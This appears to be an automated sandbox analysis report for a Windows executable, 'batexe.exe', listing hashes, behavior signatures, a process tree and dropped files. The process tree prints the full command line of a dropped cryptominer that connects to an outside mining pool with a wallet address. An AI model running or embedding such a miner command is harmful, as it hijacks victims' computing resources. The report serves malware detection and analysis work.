Analysis
-
max time kernel
295s -
max time network
304s -
platform
windows10-1703_x64 -
resource
win10-20240214-ja -
resource tags
arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
17/02/2024, 08:16
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 4784 b2e.exe 4792 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4792 cpuminer-sse2.exe 4792 cpuminer-sse2.exe 4792 cpuminer-sse2.exe 4792 cpuminer-sse2.exe 4792 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/4304-6-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4304 wrote to memory of 4784 4304 batexe.exe 75 PID 4304 wrote to memory of 4784 4304 batexe.exe 75 PID 4304 wrote to memory of 4784 4304 batexe.exe 75 PID 4784 wrote to memory of 228 4784 b2e.exe 76 PID 4784 wrote to memory of 228 4784 b2e.exe 76 PID 4784 wrote to memory of 228 4784 b2e.exe 76 PID 228 wrote to memory of 4792 228 cmd.exe 79 PID 228 wrote to memory of 4792 228 cmd.exe 79
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Users\Admin\AppData\Local\Temp\BF2.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\BF2.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\BF2.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\11ED.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4792
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
624KB
MD5ef088233200d4a5d6d056582ca4db354
SHA115122d13a5567b5b19be9d31b79ef4fc2c6c6af6
SHA256d7850fe30b89e4d5aa3dbd464ff7b83573146d34d75459bec9b10f3a2aa1d057
SHA512eae735b592bcce91e41bdb6a8dbcbaa76437c781a677779ed9ee78a2a57e9198a1d5cac5382e030378b6a9bb77e8d4f62ef3812f443a4b6fbdee6fd453094842
-
Filesize
2.5MB
MD53dad9afc1e5d7683aede63a3d4bc7cbf
SHA1248ac5d4688d5d2d73177ea51443b54d37b233b3
SHA256015c9cc82c981850ef20c86af75586addffcdb494110f398e24c8ac2b3dc7359
SHA512c7588a8e5efa0090d4a1762926ff46860efebb90e949f567ed074ea9685c23ef5c8d7a455aecbc079b43747e01606f28034dbd25a11c67786a1b88eb091f8446
-
Filesize
381KB
MD5ec66e04e3565469aa9f927722afd621e
SHA13a18fbe2a03f5a48fa9154b167a9ccc718d4aedc
SHA2568ee03b19db0ec99cb158817199caabd38a144bbcb8dc92cfc2a69c88e8ce326a
SHA5124f4a9a17f24ecc32016e1656e71b3b54e2fd2e6e9e806b56db6156a7efd6935f4c69f7fb8c8c064d5c41a92eb0b827e62f88fa16be6e439aa9bc122ca49dceb2
-
Filesize
156KB
MD5e3dbd98ce9b647dea14f8ff59cdba93a
SHA168ec2e13e2ecd0d532683cebe0a6e18b010abdf1
SHA256eeee2e094e1da219d677b63293fa7b66879cbe24eac88e08c576466f23ba0099
SHA512251d221bb20ce3ddbc17b5574cf664398d2ff528d4ba072547e7a4ae1f9804ab337e6ea9fb114f9acacab50d60c5863bb85a46def61eb9d3317c276efce2f713
-
Filesize
188KB
MD5442b0830960e45a471f32c5885ed5e0f
SHA1e8433ea1bc1e3e076daa231c38eb3431479a606d
SHA25657a12f2501516131f9364fa32130943aaf552fefe4abb5e95883335e5b3bc526
SHA51224d86d860cdcfecf902b4cdb93db4088979ecf3b92a0bd10b5e77d4accd396a19c16803337875eb884beff911bb790b55e8aae1f96c9be053b3759cf85455273
-
Filesize
157KB
MD5fa514b143178021df86119e5b341dec4
SHA16c3c67b7dd65a350c3a54b9aec8f18f5313ed426
SHA256a613d64b42ff5877432acbffd9c6a0bfd4a198684b6350b50a6d15316f8ad329
SHA5123be0e855a2a4defad7c8d8e9b8a7c625278004c14b4458315a624c5d67ca01dcb68f0509158cc0f38cffd3e882cee27bd2ac9cd690a52e6da838e76bac54097f
-
Filesize
65KB
MD51e136b0b5044e713cd6ec891c567c574
SHA1e44176528a336e43df82d0972ed2ad4319286874
SHA2566804a1400c7c9f976f336f131d07814e8bc4897c6ef9d539bcef76b3d795cd55
SHA5124c893f798b5fc762ab965d6e10303516bd181d8e1558381d20b73eb0bb9e2c3bcf93f2542b6e5c984cef9fae20e9932761fee5bb40355d98bf53b7f23846f254